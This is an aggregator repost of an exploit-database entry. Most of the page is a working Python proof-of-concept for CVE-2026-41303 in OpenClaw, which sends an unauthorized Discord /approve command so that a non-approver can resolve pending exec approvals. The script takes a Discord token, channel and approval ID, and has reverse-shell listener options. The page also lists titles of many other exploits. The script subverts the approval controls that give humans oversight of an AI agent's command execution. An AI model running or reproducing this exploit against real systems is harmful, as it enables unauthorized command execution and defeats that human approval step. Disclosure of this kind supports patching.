惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

P
Palo Alto Networks Blog
大猫的无限游戏
大猫的无限游戏
Martin Fowler
Martin Fowler
GbyAI
GbyAI
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
量子位
T
The Blog of Author Tim Ferriss
Y
Y Combinator Blog
Microsoft Azure Blog
Microsoft Azure Blog
C
CERT Recently Published Vulnerability Notes
Recent Announcements
Recent Announcements
A
About on SuperTechFans
aimingoo的专栏
aimingoo的专栏
P
Privacy International News Feed
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
博客园 - 叶小钗
L
Lohrmann on Cybersecurity
G
GRAHAM CLULEY
T
The Exploit Database - CXSecurity.com
Hugging Face - Blog
Hugging Face - Blog
P
Proofpoint News Feed
NISL@THU
NISL@THU
博客园 - Franky
C
Cybersecurity and Infrastructure Security Agency CISA
The Register - Security
The Register - Security
M
MIT News - Artificial intelligence
Know Your Adversary
Know Your Adversary
A
Arctic Wolf
F
Full Disclosure
T
Threat Research - Cisco Blogs
P
Privacy & Cybersecurity Law Blog
The Hacker News
The Hacker News
博客园 - 【当耐特】
D
Docker
T
Tailwind CSS Blog
S
SegmentFault 最新的问题
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Jina AI
Jina AI
Help Net Security
Help Net Security
V
Visual Studio Blog
小众软件
小众软件
B
Blog
Vercel News
Vercel News
云风的 BLOG
云风的 BLOG
N
News and Events Feed by Topic
Forbes - Security
Forbes - Security
N
Netflix TechBlog - Medium
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
C
Cisco Blogs
Security Archives - TechRepublic
Security Archives - TechRepublic

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass
Mohammed Idr · 2026-04-23 · via The Exploit Database - CXSecurity.com

OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass

#!/usr/bin/env python3 # Exploit Title: OpenClaw Discord Text Approval Authorization Bypass # CVE: CVE-2026-41303 # Date: 2026-04-21 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/openclaw/openclaw # Software Link: https://github.com/openclaw/openclaw # Affected: OpenClaw < 2026.3.28 # Tested on: OpenClaw 2026.3.24 # Category: Authorization Bypass # Platform: Linux / Discord # Exploit Type: Remote # CVSS: 8.8 # CWE : CWE-863 # Description: OpenClaw before 2026.3.28 contains an authorization bypass vulnerability in Discord text approval commands that allows non-approvers to resolve pending exec approvals. # Fixed in: 2026.3.28 # Usage: # python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py https://openclaw.example.com --lhost 192.168.1.100 --lport 4444 # # Options: # # Notes: # This is a simple PoC script that demonstrates the authorization bypass. # It requires a Discord user token with access to the channel where OpenClaw bot is present. # The script sends the /approve slash command to bypass the approvers list. # # How to Use # # Step 1: Obtain a pending approval ID from the OpenClaw Discord channel. # Step 2: Run the exploit with your Discord token, channel ID, approval ID, and decision. print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-41303 • OpenClaw Discord Approval Bypass ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import argparse import requests import json import time def main(): parser = argparse.ArgumentParser(description="CVE-2026-41303 - OpenClaw Discord Approval Bypass PoC") parser.add_argument("target", help="OpenClaw instance URL or Discord guild/channel context") parser.add_argument("--token", required=True, help="Discord user or bot token") parser.add_argument("--channel-id", required=True, help="Discord channel ID where the bot listens") parser.add_argument("--approval-id", required=True, help="Pending approval ID to bypass") parser.add_argument("--decision", default="allow-once", choices=["allow-once", "allow-always"], help="Approval decision") parser.add_argument("--lhost", help="Your listener IP (for reverse shell if approval triggers RCE)") parser.add_argument("--lport", help="Your listener port") args = parser.parse_args() print("[+] Starting CVE-2026-41303 PoC by @banyamer_security") print(f"[+] Target : {args.target}") print(f"[+] Channel ID : {args.channel_id}") print(f"[+] Approval ID : {args.approval_id}") print(f"[+] Decision : {args.decision}") if args.lhost and args.lport: print(f"[+] Listener : {args.lhost}:{args.lport} (for post-approval payload)") # Build Discord interaction payload for /approve command payload = { "type": 2, # APPLICATION_COMMAND "application_id": "OPENCLAW_BOT_APP_ID", # Replace with actual OpenClaw bot application ID if known "guild_id": "YOUR_GUILD_ID", # Optional - fill if needed "channel_id": args.channel_id, "data": { "name": "approve", "options": [ {"name": "id", "value": args.approval_id}, {"name": "decision", "value": args.decision} ] } } headers = { "Authorization": f"{args.token}", "Content-Type": "application/json" } print("[+] Sending unauthorized /approve command via Discord API...") try: r = requests.post( "https://discord.com/api/v10/interactions", json=payload, headers=headers, timeout=10 ) print(f"[+] HTTP Status: {r.status_code}") if r.status_code in [200, 204]: print("[+] Success! The approval was processed without checking the approvers list.") print("[+] Non-approver successfully bypassed authorization (CVE-2026-41303).") if args.lhost and args.lport: print("[+] If the approved command spawns a shell, you should receive a connection shortly.") elif r.status_code == 401: print("[-] Invalid Discord token.") else: print(f"[-] Unexpected response: {r.text[:500]}") except Exception as e: print(f"[-] Error: {e}") print("\n[+] PoC completed. Patch to OpenClaw >= 2026.3.28 immediately.") print("[+] Credit: Mohammed Idrees Banyamer (@banyamer_security)") if __name__ == "__main__": main()

References:

https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq




 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}